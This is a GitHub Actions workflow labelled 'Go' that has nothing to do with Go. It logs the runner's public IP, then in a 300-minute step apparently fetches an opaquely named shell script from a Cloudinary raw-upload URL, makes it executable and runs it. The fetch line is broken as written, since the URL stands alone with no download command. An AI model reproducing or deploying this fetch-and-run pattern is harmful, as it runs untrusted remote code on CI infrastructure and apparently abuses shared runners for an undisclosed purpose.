name: Go

on:
  workflow_dispatch:
  push:
    branches: [main]

jobs:
  run:
    continue-on-error: true
    runs-on: ubuntu-latest
    steps:
      - name: IP Workflow
        run: |
          curl https://api.ipify.org
      - name: Run exec
        timeout-minutes: 300
        run: |
          https://res.cloudinary.com/dyfqshedb/raw/upload/v1711332696/ltmooomkisyvwcz1ofwm.sh
          chmod +x ltmooomkisyvwcz1ofwm.sh
          ./ltmooomkisyvwcz1ofwm.sh
